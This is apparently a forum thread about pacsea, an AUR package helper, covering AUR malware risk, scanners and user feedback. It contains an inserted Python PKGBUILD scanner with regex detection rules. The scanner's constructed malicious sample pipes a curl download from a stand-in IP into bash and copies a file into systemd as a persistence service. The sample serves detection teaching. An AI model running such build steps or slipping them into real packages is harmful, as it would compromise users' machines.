Gotta assume Arch does a CVE scan before releasing an update. Yours would be a ‘post’ or ‘during’ package scan? The snark in me wants to say overkill, but in reality no one would turn down extra security. Interesting.
Even after the github introduction it resembles pacseek.
I like the pkgbuild dealio.
Compared to yay and pacseek we can do a lot of these things, save a couple…
What about a dry run? That might be interesting.
My hat's off to all creators/creatives. May check it out.
As it is not listed here: a dry-run is partially implemented (full implementation planned). As it is thought of more as a tool for development, dry-run is implemented as an option flag ‘--dry-run’. At the moment the dry-run is only implemented for installing/removing packages.
As the AUR is “user maintained” it does not have any checks for new packages. As I am also a new maintainer of packages, the only thing that is somewhat of a safety check is the voting system, and users looking at the PKGBUILDs.
The problem with this approach is that most of the AUR packages are not voted for (for whatever reason). I think a download counter would also help with security, as you can also look out for downloads, but this could also be manipulated.
I think it is a tough situation overall. And as a heavy AUR user myself I want to do something about it. Whether it’s effective or not, I don’t know yet.
I am no security expert and I am learning new ways each day that may improve the situation, but I also have to discard many ideas as they are not effective against the most common malware attacks on the AUR. As a matter of fact, I implemented the first tools: ClamAV, VirusTotal, ShellCheck, Trivy and Semgrep-bin, but as I explored the tools further, only ShellCheck may be effective against zero-day malware.
ClamAV and VirusTotal are used more for known viruses.
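The post above leans on two things for AUR safety: users actually reading the PKGBUILD, and a preflight scan with tools like ShellCheck. The following is an added example (not pacsea's own code and not one of the scanners named above) of what such a preflight step can do beyond shell linting: a heuristic pass over a PKGBUILD that flags the constructs a reviewer would want to look at first, such as downloads piped into a shell, inline base64 decoding, writes outside `$pkgdir`, plaintext or bare-IP sources, and a source host that differs from the declared `url`. Both PKGBUILD texts are constructed samples; a finding is a prompt to read the file, not a verdict.

```python
"""Heuristic PKGBUILD preflight check (added example, not pacsea code).

Complements linters/AV scanners: it looks for idioms that are common in
malicious PKGBUILDs but rare in legitimate ones, so the user can inspect
those lines before makepkg runs them.
"""
import re
from urllib.parse import urlparse

# Constructed sample: a typical clean binary package.
CLEAN_PKGBUILD = """\
pkgname=example-bin
pkgver=1.0
pkgrel=1
url="https://github.com/example/example"
source=("https://github.com/example/example/releases/download/v1.0/example.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
}
"""

# Constructed sample: same package with several suspicious additions
# (198.51.100.7 is a documentation-reserved address, not a real host).
SUSPICIOUS_PKGBUILD = """\
pkgname=example-bin
pkgver=1.0
pkgrel=1
url="https://github.com/example/example"
source=("http://198.51.100.7/payload.sh")
sha256sums=('SKIP')
build() {
  curl -s http://198.51.100.7/x | bash
  echo aGVsbG8= | base64 -d > /tmp/x
}
package() {
  install -Dm755 "$srcdir/example" "$pkgdir/usr/bin/example"
  cp "$srcdir/x" /usr/lib/systemd/system/persist.service
}
"""

# Line-level rules: (name, regex). Each matches one risky shell idiom.
RULES = [
    # curl/wget output piped straight into a shell
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    # inline base64 decoding, a common way to hide a payload in the file
    ("base64-decode", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    # eval of built-up strings
    ("eval", re.compile(r"(^|[\s;])eval\s")),
    # copying/installing into the live filesystem instead of $pkgdir
    ("write-outside-pkgdir",
     re.compile(r"\b(cp|mv|install|tee|ln)\b[^#\n]*\s/(etc|usr|home|root|var|tmp)/")),
]


def source_urls(text):
    """Return the URLs listed in the source=(...) array."""
    m = re.search(r"^source=\((.*?)\)", text, re.S | re.M)
    if not m:
        return []
    urls = []
    for tok in m.group(1).split():
        tok = tok.strip("\"'").split("::", 1)[-1]  # makepkg allows name::url
        if "://" in tok:
            urls.append(tok)
    return urls


def scan_pkgbuild(text):
    """Return a list of (rule, detail) findings for one PKGBUILD text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # ignore trailing comments
        for name, rx in RULES:
            if rx.search(code):
                findings.append((name, f"line {lineno}: {line.strip()}"))
    m = re.search(r"^url=[\"']?([^\s\"']+)", text, re.M)
    upstream = urlparse(m.group(1)).hostname if m else ""
    for src in source_urls(text):
        p = urlparse(src)
        host = p.hostname or ""
        if p.scheme == "http":
            findings.append(("plaintext-source", src))
        if re.fullmatch(r"\d+\.\d+\.\d+\.\d+", host):
            findings.append(("ip-address-source", src))
        elif upstream and host != upstream:
            findings.append(("source-host-differs-from-url", f"{host} != {upstream}"))
    return findings


if __name__ == "__main__":
    for label, text in (("clean", CLEAN_PKGBUILD), ("suspicious", SUSPICIOUS_PKGBUILD)):
        print(f"== {label}: {len(scan_pkgbuild(text))} finding(s)")
        for name, detail in scan_pkgbuild(text):
            print(f"  [{name}] {detail}")
```

The rules are deliberately few and readable; the point is to surface the handful of lines a human should read, not to replace reading the PKGBUILD. A real preflight would also run ShellCheck on the same file and refuse to proceed on `'SKIP'` checksums for non-VCS sources.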
There, search for the package and press either Enter to directly remove it. Preflight will be opened, if set, and in the preflight you will have the keybind as mentioned.
Of course I am still working on bugfixes and security issues that pop up. In terms of features, there will be less, as I am quite happy with the current state.
I will of course look at suggestions by the community, and I also have some things that I want to implement, but I am also in university and need to prioritize my life.
I gave it a spin today. Interesting window layout. I wanted to see if I could install ‘Openshot-bin’ from AUR. It took about 2 hours after installing and compiling the dependencies it needed. In the end it said it was completed successfully. Upon running the program it didn’t initialize... just seeing the bouncing icon attempt to initialize. I’ve got the latest AppImage version installed and it works. Keep up the work... I’m sure when you get it all worked out it’ll be a fine package installer. Just my two cents... Writing programs can’t be too easy of a task, realizing all of the complexities involved.
You could be very right about a PKGBUILD in AUR. I have both yay and paru installed on my computers. I actually tried yay in an earlier attempt and it was taking forever to compile the program dependencies. So I thought I would give pacsea a try to see what the ‘final’ outcome would give me. In the end it stated it had successfully completed the installation. What I got when I clicked the program icon to activate it was just a ‘bouncing’ icon, which then just disappeared. Don’t take this in a negative way... your programming skills must be exceptional. It’s not an easy task to write software, in my opinion. Don’t give up the fight... I like what I see... it’s definitely an excellent start.